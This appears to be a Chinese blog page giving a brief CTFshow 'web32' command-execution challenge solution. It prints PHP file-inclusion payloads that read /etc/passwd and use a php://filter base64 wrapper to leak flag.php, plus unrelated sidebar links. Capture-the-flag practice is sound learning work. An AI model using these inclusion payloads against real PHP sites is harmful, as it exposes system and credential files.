当前位置:网站首页>CTFshow,命令执行:web32
CTFshow,命令执行:web32
2022-08-01 09:48:00 【Part 02】
?c=include%0a$_GET[1]?>&1=/etc/passwd
最后一行 php 可不带分号,包含逃逸

没有输出语句不能输出文件
伪协议读取
?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

边栏推荐
- network basic learning
- Redis middleware (from building to refuse pit)
- SAP ABAP OData 服务如何支持 $orderby (排序)操作试读版
- SQL Server database schema and objects related knowledge notes
- InputStream转成String
- How to implement deep copy in js?
- Prime Ring Problem(素数环问题)
- sql server, FULL模式, dbcc shrinkfile(2,1) 不能收缩事务日志,还是原来的大小,是为什么?
- C语言程序设计50例(三)(经典收藏)
- ASP.NET Core 6框架揭秘实例演示[30]:利用路由开发REST API
猜你喜欢
随机推荐
MySQL 必现之死锁
PHP获取时间戳后写数据库的一个问题
灵魂发问:MySQL是如何解决幻读的?
[Software Architecture Mode] The difference between MVVM mode and MVC mode
Message queue interview latest finishing (2022)
Naive Bayes--Study Notes--Basic Principles and Code Implementation
《时代》杂志:元宇宙时代将改变世界
In the background of the GBase 8c database, what command is used to perform the master-slave switchover operation for the gtm and dn nodes
Introduction and application of heap memory (including examples)
Meeting OA (Upcoming Meetings & All Meetings)
STM32个人笔记-程序跑飞
笔记。。。。
Analysis of High Availability Solution Based on MySql, Redis, Mq, ES
Classify GBase 8 s lock
【Untitled】
STM32个人笔记-嵌入式C语言优化
50.【动态二维数组的运用】
笔记。。。。
js中如何实现深拷贝?
AI篮球裁判火了,走步算得特别准,就问哈登慌不慌








